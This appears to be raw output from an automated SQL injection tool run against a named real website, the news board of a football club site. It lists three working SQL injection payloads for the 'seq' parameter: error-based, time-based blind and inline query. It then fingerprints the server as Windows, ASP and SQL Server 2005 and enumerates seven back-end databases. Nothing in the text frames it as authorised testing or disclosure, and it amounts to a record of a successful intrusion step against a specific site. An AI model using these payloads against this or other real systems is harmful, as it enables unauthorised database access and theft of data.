http://www.hyundai-motorsfc.com/news/motors_board_view.asp?seq=57216&page=1
Parameter: seq (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: seq=57216 AND 8221=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8221=8221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(118)+CHAR(113)))&page=1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: seq=57216 AND 1518=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&page=1
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: seq=(SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(118)+CHAR(113))&page=1
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] master
[*] model
[*] motorsfc
[*] motorsfc_2013
[*] msdb
[*] sms
[*] tempdb